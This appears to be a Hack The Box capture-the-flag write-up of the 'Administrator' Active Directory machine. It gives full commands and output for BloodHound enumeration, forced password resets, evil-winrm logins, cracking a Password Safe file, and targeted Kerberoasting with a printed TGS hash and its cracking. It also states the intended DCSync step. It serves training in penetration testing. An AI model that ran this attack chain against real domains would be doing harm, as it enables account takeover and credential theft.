Administrator is a medium-difficulty machine from Hack The Box where we were provided credentials in an Assumed Breach approach. We’ll first begin by BloodHound enumeration where we’ll abuse GenericAll -> ForceChangePassword to finally abuse an open FTP share with user credentials, one of which will be used to perform a Kerberoasting attack on the system to land a user with DcSync privileges and dump the hashes from the system to become Administrator. Administrator-info-card
PS C:\Users\0xkujen> nmap -A-Pn10.129.207.232 Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-1120:07 W. Central Africa Standard Time Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 22.90% done; ETC: 20:11 (0:03:09 remaining) Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 23.03% done; ETC: 20:11 (0:03:07 remaining) Nmap scan report for10.129.207.232 Host is up (0.59s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-1202:14:22Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in261.69 seconds
We can see that we’re dealing with a domain controller machine (since we can scan for Kerberos port 88 and ldap port 389). We also have a suspicious looking ftp port open.
We were also provided with a user credentials just like in an Assumed Breach pentest: Username: Olivia Password: ichliebedich
┌──(kali㉿kali)-[~] └─$ bloodhound-python -c All -u Olivia -p 'ichliebedich' -d Administrator.htb -ns 10.129.207.232 --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: administrator.htb INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.administrator.htb:88)] [Errno 111] Connection refused INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc.administrator.htb INFO: Found 11 users INFO: Found 53 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc.administrator.htb INFO: Done in 00M 17S INFO: Compressing output into 20250418105826_bloodhound.zip
We start off with BloodHound Enumeration using bloodhound-python since we are provided with user credentials. BloodHound Enumeration
We can see that our user Olivia has GenericAll on MICHAEL which himself hs ForceChangePassword on BENJAMIN who is a member of SHARE MODERATORS on the domain.
We can also see that OLIVIA is a member of Remote Management Users group so let’s connect to her session using evil-winrm:
As MICHAEL is also a member of Remote Management Users, we can connect using the new password over evil-winrm:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
┌──(kali㉿kali)-[~] └─$ evil-winrm -i administrator.htb -u michael -p 'NewPasswordKujen123!' Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\michael\Documents> whoami administrator\michael *Evil-WinRM* PS C:\Users\michael\Documents>
Now since MICAHEL has ForceChangePassword over BENJAMIN, we’ll do the same steps we did before to change BENJAMIN‘s password:
Now we have from BloodHound that BENJAMIN is member of SHARE MODERATORS group. Shares have to do with file access. So I instantly thought of accessing our previously discovered ftp port using BENJAMIN‘s new credentials:
┌──(kali㉿kali)-[~] └─$ ftp [email protected] Connected to administrator.htb.localdomain. 220 Microsoft FTP Service 331 Password required Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||54695|) 125 Data connection already open; Transfer starting. 10-05-24 09:13AM 952 Backup.psafe3 226 Transfer complete. ftp> get Backup.psafe3 local: Backup.psafe3 remote: Backup.psafe3 229 Entering Extended Passive Mode (|||54696|) 125 Data connection already open; Transfer starting. 100% |****************************************************************************************************| 952 4.62 KiB/s 00:00 ETA 226 Transfer complete. WARNING! 3 bare linefeeds received in ASCII mode. File may not have transferred correctly. 952 bytes received in 00:00 (3.64 KiB/s)
And that was indeed true, we got access to a Backup.psafe3which is a Password Safe V3 database.
First, this database is password protected so we’ll crack the hash for it using JohnTheRipper:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(kali㉿kali)-[~] └─$ pwsafe2john Backup.psafe3 > backup.hash ┌──(kali㉿kali)-[~] └─$ john -w=/usr/share/wordlists/rockyou.txt backup.hash Using default input encoding: UTF-8 Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x]) No password hashes left to crack (see FAQ) ┌──(kali㉿kali)-[~] └─$ john backup.hash --show Backu:tekieromucho
1 password hash cracked, 0 left
We can now open the safe with pwsafe: psafe backup
We can see that emily is a member of Remote Management Users so we connect using her credentials and claim our user flag:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~] └─$ evil-winrm -i administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\emily\Documents> cat ../desktop/user.txt abb3ce3ab32dbac6bd5124d2ce4f1f6e *Evil-WinRM* PS C:\Users\emily\Documents>
Privilege Escalation to Administrator - Kerberoasting
We can use this github project to do a targeted kerberoast using these credentials. Using emily, we got this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(kali㉿kali)-[~/Hackthebox/Administrator/targetedKerberoast] └─$ python3 targetedKerberoast.py -v -d 'Administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' [*] Starting kerberoast attacks [*] Fetching usernames from Active Directory with LDAP [VERBOSE] SPN added successfully for (ethan) [+] Printing hashfor (ethan) $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$b71d0716274a7443c90e8ea360829a6a$28fd732a2e3c6b9a170dc118ca37223e0ee7e4ecd08d374aa7da3a61c1616715a8711c8a41a0242e115df9841e9c0b7576391af212912c5ba4c9a1c24d3d3cf1aab2cf05c47f06038056149d9c2eed0ffd5587b0d4f2b1876755623a6341805d0aeee4201513909052d105429d0ead5d954109b4c0a27d3dfa46c5b06de182156994d5237a82156501bf6fb702be3728c340a78e0f2efa9ec26d2884a8a53c67f4e265e3493cbad2e2dd39dd3403ce94cd5cf0505f938fc206133323f1cbe6fa0ec5898cc4e41660364e0a2fce0f3a102925eea3fc5e7a78ada09c8095e66ff122cea1e663e1eaa1c8c05c6bb681fba3e8892fc2a170a63caa756482056264184149b9a31705b84db553aa79c4f9ed95c19e730e01a832f03b55c99050ae6004a83d89245d95b842508f9010c1560f1323bfdf41191a050b60f0daf0ab857b0d964ee2412792bd533c05ae77f15a55ab772afac8c8c2afc53d90fe8f2241240cca387c1fd284d0439523deb512bc604f54536ac9ab252b96fa13f28712c535b6b4b409da05cbc55b0265a994fff6e1603cb0b63d33666baf100d2b28b47577e40519df3397fd8bf5f43dedeab79e2459d8eb0356b2000dab63b9c98f61dab8f6d8fa995d34a08872e4c5d94a4cb6da5c8cd765bd80cdb781be399a53f17c9fc396c463e15e7dba30334523c1a9df6e4d57a3813d9c6dd97898ce9b8f3a5bdac0f2dc9a53d453bf074171009733b8b7c261ef33bdd8a7b76bc5b4b2ea36b6906a38679bb6fdcd6b75adee462d69fa971fa221146072220f27422d6dfee89501021e818e19f13d31df2f0fbb22ffb9426489462459d62142ccee93881cd732cbc9ea7554912dc881bfce215b3df794465974458d6933bb48e2f524e0fe24c1f7538777274d02a8d4f598fa6973a82ac3f6edd4702fd13549104e8de9d583af42c044d121ae72030fd5d6c1bdb69127cf4f7aa420cf1b65a7f42ce39f957926d29ef0c944d26963d4b34ac4e29f85da452b94283bbe6114bb82acb6e28dd0f64b11b28e21c270a95f28d6c54642db2f6cf2d1de8e45c55db8b9b627dd5805c2d9ef1b26933c9d6fc071f2612d1753b700500e8cdb4d8930a3a41482140fd9051837d59eee302912ca3e280e8182951fece31c2922a4497eecea232e60a68a354c9fa2d7c9383a1d7f4bd99d8797489d7afc7bfcb47a41a2e01fe721d96c38e2ad9460d60b51b525fbc3668d3434d4d849a7072ac359717475f079ad136fe2c705fcf900f084db7138f4b4c55ea7625fc435a1ffe69e99998e3f2d8a840efddd459b1e2c43458d2c15e1fb74bf75a3e8796609a47f0bf99ce3e26b64a148c293c9473342c09af5db16336bb36ff1a17fd9837ce7c39ac372f1b853e34e74b28f4594921b07b11fa278842c06fd3d3e9311d9e3f6cae366c3a0a207667211fd587a648faa631a4beb7f0484b39494d875e6455cceadaf8b2a7ad26e795bdd46e80e2a41eb4d0339f8afe99b2b2bf4646157c3ba182b9cacd06b2681500be16e3908 [VERBOSE] SPN removed successfully for (ethan) ┌──(kali㉿kali)-[~/Hackthebox/Administrator] └─$ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash.ethan Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status limpbizkit (?) 1g 0:00:00:00 DONE (2024-11-11 22:13) 16.66g/s 85333p/s 85333c/s 85333C/s newzealand..babygrl Use the "--show" option to display all of the cracked passwords reliably Session completed.
So we basically kerberoasted the ethan user and then cracked his password.
Now checking BloodHound once again, we can see that ethan has DcSync privileges on the domain. Therefore we can dump secrets using his credentials:
